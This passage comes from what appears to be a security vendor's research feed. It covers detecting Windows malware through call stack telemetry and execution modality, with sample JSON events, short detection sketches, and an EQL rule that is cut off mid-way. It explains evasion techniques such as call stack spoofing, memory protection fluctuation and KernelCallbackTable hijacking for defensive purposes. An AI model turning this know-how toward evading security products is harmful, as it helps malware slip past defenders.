      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\ntdll.dll!RtlUserThreadStart+0x21&quot; /* Native API - the ETHREAD.StartAddress module */
      }
    ],
    &quot;call_stack_final_user_module&quot;: {
      &quot;path&quot;: &quot;c:\\users\\user\\desktop\\file.dll&quot;,
      &quot;code_signature&quot;: [ { &quot;exists&quot;: false } ],
      &quot;name&quot;: &quot;file.dll&quot;,
      &quot;hash&quot;: { &quot;sha256&quot;: &quot;0240cc89d4a76bafa9dcdccd831a263bf715af53e46cac0b0abca8116122d242&quot; }
    }
  }
}
</code></pre>
<p>Sample enriched call stack</p>
<p>Call stack final user module enrichments:</p>
<table>
<thead>
<tr>
<th align="left">name</th>
<th align="left">The file name of the call_stack_final_user_module. Can also be &quot;Unbacked&quot; indicating private executable memory, or &quot;Undetermined&quot; indicating a suspicious call stack.</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">path</td>
<td align="left">The file path of the call_stack_final_user_module.</td>
</tr>
<tr>
<td align="left">hash.sha256</td>
<td align="left">The sha256 of the call_stack_final_user_module, or the protection_provenance module if any.</td>
</tr>
<tr>
<td align="left">code_signature</td>
<td align="left">Code signature of the call_stack_final_user_module, or the protection_provenance module if any.</td>
</tr>
<tr>
<td align="left">allocation_private_bytes</td>
<td align="left">The number of bytes in this memory region that are both +X and non-shareable. Non-zero values can indicate code hooking, patching, or hollowing.</td>
</tr>
<tr>
<td align="left">protection</td>
<td align="left">The memory protection for the acting region of pages is included if it is not RX. Corresponds to MEMORY_BASIC_INFORMATION.Protect.</td>
</tr>
<tr>
<td align="left">protection_provenance</td>
<td align="left">The name of the memory region that caused the last modification of the protection of this page. &quot;Unbacked&quot; may indicate shellcode.</td>
</tr>
<tr>
<td align="left">protection_provenance_path</td>
<td align="left">The path of the module that caused the last modification of the protection of this page.</td>
</tr>
<tr>
<td align="left">reason</td>
<td align="left">The anomalous call_stack_summary that led to an &quot;Undetermined&quot; protection_provenance.</td>
</tr>
</tbody>
</table>
<h2>A quick call stack glossary</h2>
<p>When examining call stacks, there are some Native API functions that are helpful to be familiar with. Ken Johnson, now of Microsoft, has provided us with a <a href="http://www.nynaeve.net/?p=200">catalog of NTDLL kernel mode to user mode callbacks</a> to get us started. Seriously, you should pause here and go read that first.</p>
<p>We met RtlUserThreadStart earlier. Both it and its sibling RtlUserFiberStart should only ever appear at the bottom of a call stack. These are the entrypoints for user threads and <a href="https://learn.microsoft.com/en-us/windows/win32/procthread/fibers">fibers</a>, respectively. The first instruction on every thread, however, is actually LdrInitializeThunk. After performing the user-mode component of thread initialisation (and process, if required), this function transfers control to the entrypoint via NtContinue, which updates the instruction pointer directly. This means that it does not appear in any future stack walks.</p>
<p>So if you see a call stack that includes LdrInitializeThunk then this means you are at the very start of a thread’s execution. This is where the application compatibility <a href="https://techcommunity.microsoft.com/blog/askperf/demystifying-shims---or---using-the-app-compat-toolkit-to-make-your-old-stuff-wo/374947">Shim Engine</a> operates, where hook-based security products prefer to install themselves, and where malware tries to gain execution <em>before</em> those other security products. <a href="https://malwaretech.com/2024/02/bypassing-edrs-with-edr-preload.html">Marcus Hutchins</a> and <a href="https://www.outflank.nl/blog/2024/10/15/introducing-early-cascade-injection-from-windows-process-creation-to-stealthy-injection/">Guido Miggelenbrink</a> have both written excellent blogs on this topic. This startup race does not exist for security products that utilise <a href="https://www.elastic.co/kr/security-labs/kernel-etw-best-etw">kernel ETW</a> for telemetry.</p>
<pre><code class="language-json">{
  &quot;process.thread.Ext&quot;: {
    &quot;call_stack_summary&quot;: &quot;ntdll.dll|file.exe|ntdll.dll&quot;,
    &quot;call_stack&quot;: [
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\ntdll.dll!ZwProtectVirtualMemory+0x14&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\users\\user\\desktop\\file.exe+0x1bac8&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\ntdll.dll!RtlAnsiStringToUnicodeString+0x3cb&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\ntdll.dll!LdrInitShimEngineDynamic+0x394d&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\ntdll.dll!LdrInitializeThunk+0x1db&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\ntdll.dll!LdrInitializeThunk+0x63&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\ntdll.dll!LdrInitializeThunk+0xe&quot; }
    ],
    &quot;call_stack_final_user_module&quot;: {
      &quot;path&quot;: &quot;c:\\users\\user\\desktop\\file.exe&quot;,
      &quot;code_signature&quot;: [ { &quot;exists&quot;: false } ],
      &quot;name&quot;: &quot;file.exe&quot;,
      &quot;hash&quot;: { &quot;sha256&quot;: &quot;a59a7b56f695845ce185ddc5210bcabce1fff909bac3842c2fb325c60db15df7&quot; }
    }
  }
}
</code></pre>
<p>Pre-entrypoint execution example</p>
<p>The next pair is KiUserExceptionDispatcher and KiRaiseUserExceptionDispatcher. The kernel uses the former to pass execution to a registered user-mode structured exception handler after a user-mode exception condition has occurred. The latter also raises an exception, but on behalf of the kernel instead. This second variant is usually only caught by debuggers, including <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/application-verifier">Application Verifier</a>, and helps identify when user-mode code is not sufficiently checking return codes from syscalls. These functions will usually be seen in call stacks related to application-specific crash handling or <a href="https://learn.microsoft.com/en-us/windows/win32/wer/windows-error-reporting">Windows Error Reporting</a>. However, sometimes malware will use it as a pseudo-breakpoint — for example, to <a href="https://github.com/elastic/protections-artifacts/blob/3537aa4ed9c7ed9dcd04da2efafbad38af47a017/behavior/rules/windows/defense_evasion_virtualprotect_via_vectored_exception_handling.toml">fluctuate memory protections</a> and rehide its shellcode immediately after making a system call.</p>
<pre><code class="language-json">{
  &quot;process.thread.Ext&quot;: {
    &quot;call_stack_summary&quot;: &quot;ntdll.dll|file.exe|ntdll.dll|file.exe|kernel32.dll|ntdll.dll&quot;,
    &quot;call_stack&quot;: [
      {
        &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\ntdll.dll!ZwProtectVirtualMemory+0x14&quot;,
        &quot;protection_provenance&quot;: &quot;file.exe&quot;, /* another vendor's hooks were unhooked */
        &quot;allocation_private_bytes&quot;: 8192
      },
      { &quot;symbol_info&quot;: &quot;c:\\users\\user\\desktop\\file.exe+0xd99c&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\ntdll.dll!RtlInitializeCriticalSectionAndSpinCount+0x1c6&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\ntdll.dll!RtlWalkFrameChain+0x1119&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\ntdll.dll!KiUserExceptionDispatcher+0x2e&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\users\\user\\desktop\\file.exe+0x12612&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\kernel32.dll!BaseThreadInitThunk+0x14&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\ntdll.dll!RtlUserThreadStart+0x21&quot; }
    ],
    &quot;call_stack_final_user_module&quot;: {
      &quot;name&quot;: &quot;file.exe&quot;,
      &quot;path&quot;: &quot;c:\\users\\user\\desktop\\file.exe&quot;,
      &quot;code_signature&quot;: [ { &quot;exists&quot;: false }],
      &quot;hash&quot;:   { &quot;sha256&quot;: &quot;0e5a62c0bd9f4596501032700bb528646d6810b16d785498f23ef81c18683c74&quot; }
    }
  }
}
</code></pre>
<p>Protection fluctuation via exception handler example</p>
<p>Next is KiUserApcDispatcher, which is used to deliver <a href="https://learn.microsoft.com/en-us/windows/win32/sync/asynchronous-procedure-calls">user APCs</a>. These are among the favourite tools of malware authors, as Microsoft provides only limited visibility into their use.</p>
<pre><code class="language-json">{
  &quot;process.thread.Ext&quot;: {
    &quot;call_stack_summary&quot;: &quot;ntdll.dll|kernelbase.dll|ntdll.dll|kernelbase.dll|cronos.exe&quot;,
    &quot;call_stack&quot;: [
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\ntdll.dll!NtProtectVirtualMemory+0x14&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\kernelbase.dll!VirtualProtect+0x36&quot; }, /* tail call */
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\ntdll.dll!KiUserApcDispatcher+0x2e&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\ntdll.dll!ZwDelayExecution+0x14&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\kernelbase.dll!SleepEx+0x9e&quot; },
      {
        &quot;symbol_info&quot;: &quot;c:\\users\\user\\desktop\\file.exe+0x107d&quot;,
        &quot;allocation_private_bytes&quot;: 147456, /* stomped */
        &quot;protection&quot;: &quot;RW-&quot;, /* fluctuation */
        &quot;protection_provenance&quot;: &quot;Undetermined&quot;, /* proxied call */
        &quot;callsite_leading_bytes&quot;: &quot;010000004152524c8d520141524883ec284150415141baffffffff41525141ba010000004152524c8d520141524883ec284150b9ffffffffba0100000041ffe1&quot;,
        &quot;callsite_trailing_bytes&quot;: &quot;4883c428c3cccccccccccccccccccccccccccc894c240857b820190000e8a10c0000482be0488b052fd101004833c44889842410190000488d84243014000048&quot;
      }
    ],
    &quot;call_stack_final_user_module&quot;: {
      &quot;name&quot;: &quot;Undetermined&quot;,
      &quot;reason&quot;: &quot;ntdll.dll|kernelbase.dll|ntdll.dll|kernelbase.dll|file.exe&quot;
    }
  }
}
</code></pre>
<p>Protection fluctuation via APC example</p>
<p>The Windows window manager is implemented in a kernel-mode device driver (win32k.sys). Mostly. Sometimes the window manager needs to do something from user-mode, and KiUserCallbackDispatcher is the mechanism to achieve that. It’s basically a reverse syscall that targets user32.dll functions. Overwriting an entry in a process’s <a href="https://attack.mitre.org/techniques/T1574/013/">KernelCallbackTable</a> is an easy way to hijack a GUI thread, so any other module following this call is suspicious.</p>
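<p>As a triage heuristic, that rule of thumb can be sketched in a few lines: given an innermost-first frame list like the <code>call_stack</code> arrays in the events above, flag the event when the frame dispatched via <code>KiUserCallbackDispatcher</code> does not belong to <code>user32.dll</code>. This is an illustrative sketch only - the helper names and sample frames are invented for the example and this is not the endpoint’s implementation.</p>

```python
def module_of(symbol_info):
    '''Extract the module file name from a path!Symbol+0xNN frame string.'''
    path = symbol_info.split('!', 1)[0].split('+', 1)[0]
    return path.replace('\\', '/').rsplit('/', 1)[-1].lower()

def suspicious_callback_dispatch(call_stack):
    '''Flag a possible KernelCallbackTable hijack: the dispatcher should
    dispatch into user32.dll. Frames are ordered innermost-first.'''
    for i, frame in enumerate(call_stack):
        if 'KiUserCallbackDispatcher' in frame:
            if i == 0:
                return False  # dispatcher is innermost; nothing to check
            # The dispatcher's callee is the preceding (inner) frame.
            return module_of(call_stack[i - 1]) != 'user32.dll'
    return False

# Sample frames (invented for illustration)
benign = [
    'c:\\windows\\system32\\user32.dll!__fnDWORD+0x33',
    'c:\\windows\\system32\\ntdll.dll!KiUserCallbackDispatcher+0x2e',
]
hijacked = [
    'c:\\users\\user\\desktop\\file.exe+0x107d',
    'c:\\windows\\system32\\ntdll.dll!KiUserCallbackDispatcher+0x2e',
]
```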
<p>Knowledge of the purpose of each of these kernel-mode to user-mode entry points greatly assists in determining if a given call stack is natural or if it has been misappropriated to achieve alternative goals.</p>
<h2>Making call stacks understandable</h2>
<p>To aid understandability, we also tag the event with various process.Ext.api.behaviors that we identify. These behaviours aren’t necessarily malicious, but they highlight aspects that are relevant to alert triage or threat hunting. For call stacks, these include:</p>
<table>
<thead>
<tr>
<th align="left">native_api</th>
<th align="left">A call was made directly to the Native API rather than the Win32 API.</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">direct_syscall</td>
<td align="left">A syscall instruction originated outside of the Native API layer.</td>
</tr>
<tr>
<td align="left">proxy_call</td>
<td align="left">The call stack may indicate a proxied API call to mask the true source.</td>
</tr>
<tr>
<td align="left">shellcode</td>
<td align="left">Second generation executable non-image memory called a sensitive API.</td>
</tr>
<tr>
<td align="left">image_indirect_call</td>
<td align="left">An entry in the call stack was preceded by a call to a dynamically resolved function.</td>
</tr>
<tr>
<td align="left">image_rop</td>
<td align="left">No call instruction preceded an entry in the call stack.</td>
</tr>
<tr>
<td align="left">image_rwx</td>
<td align="left">An entry in the call stack is writable. Code should be read-only.</td>
</tr>
<tr>
<td align="left">unbacked_rwx</td>
<td align="left">An entry in the call stack is non-image and writable. Even JIT code should be read-only.</td>
</tr>
<tr>
<td align="left">truncated_stack</td>
<td align="left">The call stack seems to be unexpectedly truncated. This may be due to malicious tampering.</td>
</tr>
</tbody>
</table>
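<p>Two of the memory-protection tags above can be approximated directly from the per-frame metadata shown in earlier events. The sketch below keys off only the <code>protection</code> and <code>symbol_info</code> fields; it is a deliberate simplification for illustration, not the endpoint’s actual tagging logic.</p>

```python
def tag_frame(frame):
    '''Approximate the image_rwx / unbacked_rwx tags from one call_stack entry.'''
    tags = []
    protection = frame.get('protection', '')
    unbacked = frame.get('symbol_info', '').startswith('Unbacked')
    if 'W' in protection and 'X' in protection:
        # Code should be read-only; even JIT pages should not stay writable.
        tags.append('unbacked_rwx' if unbacked else 'image_rwx')
    return tags
```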
<p>In some contexts, these behaviours alone may be sufficient to detect malware.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/call-stacks-no-more-free-passes-for-malware/image1.png" alt="SilentMoonwalk variant alerts" /></p>
<h2>Spoofing — bypass or liability?</h2>
<p>Return address spoofing has been a staple <a href="https://www.unknowncheats.me/forum/assembly/88648-spoofing-return-address.html">game hacking</a> and <a href="https://www.welivesecurity.com/2013/08/26/nymaim-obfuscation-chronicles/">malware</a> technique for many, many years. This simple trick allows injected code to borrow the reputation of a legitimate module with few consequences. The goal of deep call stack inspection and behaviour baselines is to stop giving malware this free pass.</p>
<p>Offensive researchers have been assisting this effort by looking into approaches for full call stack spoofing. Most notably:</p>
<ul>
<li><a href="https://labs.withsecure.com/publications/spoofing-call-stacks-to-confuse-edrs">Spoofing Call Stacks To Confuse EDRs</a> by William Burgess</li>
<li><a href="https://klezvirus.github.io/RedTeaming/AV_Evasion/StackSpoofing/">SilentMoonwalk: Implementing a dynamic Call Stack Spoofer</a> by Alessandro Magnosi, Arash Parsa and Athanasios Tserpelis</li>
</ul>
<p><a href="https://media.defcon.org/DEF%20CON%2031/DEF%20CON%2031%20presentations/Alessandro%20klezVirus%20Magnosi%20Arash%20waldoirc%20Parsa%20Athanasios%20trickster0%20Tserpelis%20-%20StackMoonwalk%20A%20Novel%20approach%20to%20stack%20spoofing%20on%20Windows%20x64.pdf">SilentMoonwalk</a>, in addition to being superb offensive research, is an excellent example of how lying can get you into twice the amount of trouble — but only if you get caught. Many Defense Evasion techniques rely on security-by-obscurity — and once exposed by researchers, they can become a liability. In this case, the research included advice on the detection opportunities <strong>introduced</strong> by the evasion attempt.</p>
<pre><code class="language-json">{
  &quot;process.thread.Ext&quot;: {
    &quot;call_stack_summary&quot;: &quot;ntdll.dll|kernelbase.dll|kernel32.dll|ntdll.dll&quot;,
    &quot;call_stack&quot;: [
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\ntdll.dll!NtAllocateVirtualMemory+0x14&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\kernelbase.dll!VirtualAlloc+0x48&quot; },
      {
        &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\kernelbase.dll!CreatePrivateObjectSecurity+0x31&quot;,
        /* 4883c438 stack desync gadget - add rsp 0x38 */
        &quot;callsite_trailing_bytes&quot;: &quot;4883c438c3cccccccccccccccccccc48895c241057498bd8448bd2488bf94885c90f84660609004885db0f845d060900418bd14585c97411418bc14803c383ea&quot;,
        &quot;callsite_leading_bytes&quot;: &quot;cccccccccccccccccccccccccccccc4883ec38488b4424684889442428488b442460488944242048ff15d9b21b000f1f44000085c00f8830300900b801000000&quot;
      },
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\kernelbase.dll!Internal_EnumSystemLocales+0x406&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\kernelbase.dll!SystemTimeToTzSpecificLocalTimeEx+0x2d1&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\kernelbase.dll!WaitForMultipleObjectsEx+0x982&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\kernel32.dll!BaseThreadInitThunk+0x14&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\ntdll.dll!RtlUserThreadStart+0x21&quot; }
    ],
    &quot;call_stack_final_user_module&quot;: {
      &quot;name&quot;: &quot;Undetermined&quot;, /* gadget module resulted in suspicious call stack */
      &quot;reason&quot;: &quot;ntdll.dll|kernelbase.dll|kernel32.dll|ntdll.dll&quot;
    }
  }
}
</code></pre>
<p>SilentMoonwalk call stack example</p>
<p>A standard technique for unearthing hidden artifacts is to enumerate them using multiple techniques and compare the results for discrepancies. This is <a href="https://learn.microsoft.com/en-us/sysinternals/downloads/rootkit-revealer#how-rootkitrevealer-works">how RootkitRevealer works</a>. This approach was also used in <a href="https://github.com/jdu2600/conference_talks/blob/main/2023-09-bsidescbr-GetInjectedThreadEx.pdf">Get-InjectedThreadEx.exe</a>, which <a href="https://github.com/jdu2600/Get-InjectedThreadEx/blob/edbff70fc286a3f1c32c6249b3b913d84d70259b/Get-InjectedThreadEx.cpp#L419-L445">climbs up the thread stack</a> as well as walking down it.</p>
<p>In certain circumstances, we may be able to recover a call stack in two ways. If there are discrepancies, then you will see the less reliable call stack emitted as call_stack_summary_original.</p>
<pre><code class="language-json">{
  &quot;process.thread.Ext&quot;: {
    &quot;call_stack_summary&quot;: &quot;ntdll.dll&quot;,
    &quot;call_stack_summary_original&quot;: &quot;ntdll.dll|kernelbase.dll|version.dll|kernel32.dll|ntdll.dll&quot;,
    &quot;call_stack&quot;: [
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\ntdll.dll!NtContinue+0x12&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\ntdll.dll!LdrInitializeThunk+0x13&quot; }
    ],
    &quot;call_stack_final_user_module&quot;: {
      &quot;name&quot;: &quot;Undetermined&quot;,
      &quot;reason&quot;: &quot;ntdll.dll&quot;
    }
  }
}
</code></pre>
<p>Call Stack summary original example</p>
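<p>The cross-view idea reduces to a simple reconciliation step: recover the stack twice, keep the walk judged more reliable as <code>call_stack_summary</code>, and preserve the other as <code>call_stack_summary_original</code> only when the two disagree. The sketch below illustrates the shape of that logic; it is an assumption-laden illustration, not the endpoint’s actual algorithm.</p>

```python
def reconcile(reliable_walk, original_walk):
    '''Emit summary fields, surfacing any discrepancy between two stack walks.'''
    event = {'call_stack_summary': '|'.join(reliable_walk)}
    if reliable_walk != original_walk:
        # Keep the less reliable walk so analysts can see what differed.
        event['call_stack_summary_original'] = '|'.join(original_walk)
    return event
```

When the two walks agree, only <code>call_stack_summary</code> is emitted and no discrepancy is surfaced.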
<h2>Call Stacks are for everyone</h2>
<p>By default you will only find call stacks in our alerts, but this is configurable through advanced policy.</p>
<table>
<thead>
<tr>
<th align="left">events.callstacks.emit_in_events</th>
<th align="left">If set, call stacks will be included in regular events where they are collected. Otherwise, they are only included in events that trigger behavioral protection rules. Note that setting this may significantly increase data volumes. Default: false</th>
</tr>
</thead>
</table>
<p>Further insights into Windows call stacks are available in the following Elastic Security Labs articles:</p>
<ul>
<li><a href="https://www.elastic.co/kr/security-labs/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks">Upping the Ante: Detecting In-Memory Threats with Kernel Call Stacks</a></li>
<li><a href="https://www.elastic.co/kr/security-labs/peeling-back-the-curtain-with-call-stacks">Peeling back the curtain with call stacks</a></li>
<li><a href="https://www.elastic.co/kr/security-labs/doubling-down-etw-callstacks">Doubling Down: Detecting In-Memory Threats with Kernel ETW Call Stacks</a></li>
<li><a href="https://www.elastic.co/kr/security-labs/itw-windows-lpe-0days-insights-and-detection-strategies">In-the-Wild Windows LPE 0-days: Insights &amp; Detection Strategies</a></li>
<li><a href="https://www.elastic.co/kr/security-labs/misbehaving-modalities">Misbehaving Modalities: Detecting Tools, not Techniques</a></li>
<li><a href="https://www.elastic.co/kr/security-labs/finding-truth-in-the-shadows">Finding Truth in the Shadows</a></li>
</ul>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/call-stacks-no-more-free-passes-for-malware/Security Labs Images 33.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Misbehaving Modalities: Detecting Tools, Not Techniques]]></title>
            <link>https://www.elastic.co/kr/security-labs/misbehaving-modalities</link>
            <guid>misbehaving-modalities</guid>
            <pubDate>Thu, 15 May 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[We explore the concept of Execution Modality and how modality-focused detections can complement behaviour-focused ones.]]></description>
            <content:encoded><![CDATA[<h2><strong>What is Execution Modality?</strong></h2>
<p><a href="https://medium.com/@jaredcatkinson">Jared Atkinson</a>, Chief Strategist at SpecterOps and prolific writer on security strategy, recently introduced the very useful concept of <a href="https://posts.specterops.io/behavior-vs-execution-modality-3318e8e81739">Execution Modality</a> to help us reason about malware techniques, and how to robustly detect them. In short, Execution Modality describes <em>how</em> a malicious behaviour is executed, rather than simply defining <em>what</em> the behaviour does.</p>
<p>For example, the behaviour of interest might be <a href="https://attack.mitre.org/techniques/T1543/003/">Windows service creation</a>, and the modality might be a system utility (such as <code>sc.exe</code>), a PowerShell script, or shellcode that uses indirect syscalls to write directly to the service configuration in the Windows Registry.</p>
<p>Atkinson outlined that if your goal is to detect a specific technique, you want to ensure that your collection is as close as possible to the operating system’s source of truth and eliminate any modality assumptions.</p>
<h2><strong>Case Study: service creation modalities</strong></h2>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/misbehaving-modalities/flow.png" alt="Service creation operation flow graph" /></p>
<p>In the typical Service creation scenario within the Windows OS, an installer calls <a href="https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/sc-create"><code>sc.exe create</code></a> which makes an <a href="https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-scmr/6a8ca926-9477-4dd4-b766-692fab07227e"><code>RCreateService</code></a> RPC call to an endpoint in the <a href="https://learn.microsoft.com/en-us/windows/win32/services/service-control-manager">Service Control Manager</a> (SCM, aka <code>services.exe</code>) which then makes syscalls to the <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/windows-kernel-mode-configuration-manager">kernel-mode configuration manager</a> to update the <a href="https://learn.microsoft.com/en-us/windows/win32/services/database-of-installed-services">database of installed services</a> in the registry.  This is later flushed to disk and restored from disk on boot.</p>
<p>This means that the source of truth for a running system <a href="https://abstractionmaps.com/maps/t1050/">is the registry</a> (though hives are flushed to disk and can be tampered with offline).</p>
<p>In a threat hunting scenario, we could easily detect anomalous <code>sc.exe</code> command lines - but a different tool might make Service Control RPC calls directly.</p>
<p>If we were processing our threat data stringently, we could also detect anomalous Service Control RPC calls, but a different tool might make syscalls (in)directly or use another service, such as the <a href="https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/ec095de8-b4fe-48fb-8114-dea65b4d710e">Remote Registry</a>, to update the service database indirectly.</p>
<p>In other words, some of these execution modalities bypass traditional telemetry such as <a href="https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4697">Windows event logs</a>.</p>
<p>So how do we monitor changes to the configuration manager?  We can’t robustly monitor syscalls directly due to <a href="https://en.wikipedia.org/wiki/Kernel_Patch_Protection">Kernel Patch Protection</a>, but Microsoft has provided <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/filtering-registry-calls">configuration manager callbacks</a> as an alternative. This is where Elastic has <a href="https://github.com/tsale/EDR-Telemetry/pull/58#issuecomment-2043958734">focused our service creation detection</a> efforts - as close to the operating system’s source of truth as possible.</p>
<p>The trade-off for this low-level visibility, however, is a potential reduction in context. For example, due to Windows architectural decisions, security vendors do not know which RPC client is requesting the creation of a registry key in the services database. Microsoft only supports querying RPC client details from a user-mode RPC service.</p>
<p>Starting with Windows 10 21H1, Microsoft began including <a href="https://github.com/jdu2600/Windows10EtwEvents/commit/5444e040d65ed2807fcf9ac69ce32131338dc370#diff-b88b65ff9fd39a51c51c594ee3787ea6907e780d4282ae9a7517c04074e2c2b7">RPC client details in the service creation event log</a>. This event, while less robust, sometimes provides additional context that might assist in determining the source of an anomalous behaviour.</p>
<p>Due to their history of abuse, some modalities have been extended with extra logging - one important example is PowerShell.  This allows certain techniques to be detected with high precision - but <em>only</em> when executed within PowerShell. It is important not to conflate having detection coverage of a technique in PowerShell with coverage of that technique in general. This nuance is important when estimating <a href="https://attack.mitre.org/">MITRE ATT&amp;CK</a> coverage.  As red teams routinely demonstrate, having 100% technique coverage - but only for PowerShell - is close to 0% real-world coverage.</p>
<p><a href="https://ctid.mitre.org/projects/summiting-the-pyramid/">Summiting the Pyramid</a> (STP) is a related analytic scoring methodology from MITRE. It makes a similar conclusion about the fragility of <a href="https://center-for-threat-informed-defense.github.io/summiting-the-pyramid/analytics/service_registry_permissions_weakness_check/">PowerShell scriptblock-based detections</a> and assigns such rules a low robustness score.</p>
<p>High-level telemetry sources, such as Process Creation logging and PowerShell logging, are extremely brittle at detecting most techniques as they cover very few modalities. At best, they assist in detecting the most egregious Living off the Land (LotL) abuses.</p>
<p>Atkinson made the following astute observation in the <a href="https://posts.specterops.io/behavior-vs-execution-modality-3318e8e81739">example</a> used to motivate the discussion:</p>
<p><em>An important point is that our higher-order objective in detection is behavior-based, not modality-based. Therefore, we should be interested in detecting Session Enumeration (behavior-focused), not Session Enumeration in PowerShell (modality-focused).</em></p>
<p>Sometimes that is only half of the story though.  Sometimes detecting that the tool itself is out of context is more efficient than detecting the technique. Sometimes the execution modality itself is anomalous.</p>
<p>An alternative to detecting a known technique is to detect a misbehaving modality.</p>
<h2><strong>Call stacks divulge Modality</strong></h2>
<p>One of Elastic’s strengths is the inclusion of call stacks in the majority of our events. This level of call provenance detail greatly assists in determining whether a given activity is malicious or benign.  Call stack summaries are often sufficient to divulge the execution modality - the runtimes for PowerShell, .NET, RPC, WMI, VBA, Lua, Python, and Java all leave traces in the call stack.</p>
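<p>In practice, this can be as simple as a lookup from runtime modules seen in the summary to a modality label. The .NET runtime modules below (<code>clr.dll</code>, <code>mscorwks.dll</code>, <code>coreclr.dll</code>) and <code>vbe7.dll</code> for VBA appear elsewhere in this article; the remaining mappings are assumptions added for illustration.</p>

```python
# Illustrative runtime-module to modality mapping; not an exhaustive list.
RUNTIME_MODULES = {
    'clr.dll': '.NET',
    'coreclr.dll': '.NET',
    'mscorwks.dll': '.NET',
    'vbe7.dll': 'VBA',
    'rpcrt4.dll': 'RPC',  # assumed module name for the RPC runtime
    'jvm.dll': 'Java',    # assumed
}

def modalities(call_stack_summary):
    '''Map runtime modules in a pipe-delimited summary to modality labels.'''
    modules = call_stack_summary.lower().split('|')
    return {RUNTIME_MODULES[m] for m in modules if m in RUNTIME_MODULES}
```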
<p>Some of our <a href="https://www.elastic.co/kr/security-labs/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks">first call stack-based rules</a> were for Office VBA macros (<code>vbe7.dll</code>) spawning child processes or dropping files, and for unbacked executable memory loading the .NET runtime.  In both of these examples, the technique itself was largely benign; it was the modality of the behaviour that was predominantly anomalous.</p>
<p>So can we flip the typical behaviour-focused detection approach to a modality-focused one?  For example, can we detect solely on the use of <strong>any</strong> dual-purpose API call originating from PowerShell?</p>
<p>Using call stacks, Elastic is able to differentiate between the API calls that originate from PowerShell scripts and those that come from the PowerShell or .NET runtimes.</p>
<p>Using Threat-Intelligence ETW as an approximation for a dual-purpose API, our rule for “Suspicious API Call from a PowerShell Script” was quite effective.</p>
<pre><code class="language-sql">api where
event.provider == &quot;Microsoft-Windows-Threat-Intelligence&quot; and
process.name in~ (&quot;powershell.exe&quot;, &quot;pwsh.exe&quot;, &quot;powershell_ise.exe&quot;) and

/* PowerShell Script JIT - and incidental .NET assemblies */
process.thread.Ext.call_stack_final_user_module.name == &quot;Unbacked&quot; and
process.thread.Ext.call_stack_final_user_module.protection_provenance in (&quot;clr.dll&quot;, &quot;mscorwks.dll&quot;, &quot;coreclr.dll&quot;) and

/* filesystem enumeration activity */
not process.Ext.api.summary like &quot;IoCreateDevice( \\FileSystem\\*, (null) )&quot; and

/* exclude nop operations */
not (process.Ext.api.name == &quot;VirtualProtect&quot; and process.Ext.api.parameters.protection == &quot;RWX&quot; and process.Ext.api.parameters.protection_old == &quot;RWX&quot;) and

/* Citrix GPO Scripts */
not (process.parent.executable : &quot;C:\\Windows\\System32\\gpscript.exe&quot; and
  process.Ext.api.summary in (&quot;VirtualProtect( Unbacked, 0x10, RWX, RW- )&quot;, &quot;WriteProcessMemory( Self, Unbacked, 0x10 )&quot;, &quot;WriteProcessMemory( Self, Data, 0x10 )&quot;)) and

/* cybersecurity tools */
not (process.Ext.api.name == &quot;VirtualAlloc&quot; and process.parent.executable : (&quot;C:\\Program Files (x86)\\CyberCNSAgent\\cybercnsagent.exe&quot;, &quot;C:\\Program Files\\Velociraptor\\Velociraptor.exe&quot;)) and

/* module listing */
not (process.Ext.api.name in (&quot;EnumProcessModules&quot;, &quot;GetModuleInformation&quot;, &quot;K32GetModuleBaseNameW&quot;, &quot;K32GetModuleFileNameExW&quot;) and
  process.parent.executable : (&quot;*\\Lenovo\\*\\BGHelper.exe&quot;, &quot;*\\Octopus\\*\\Calamari.exe&quot;)) and

/* WPM triggers multiple times at process creation */
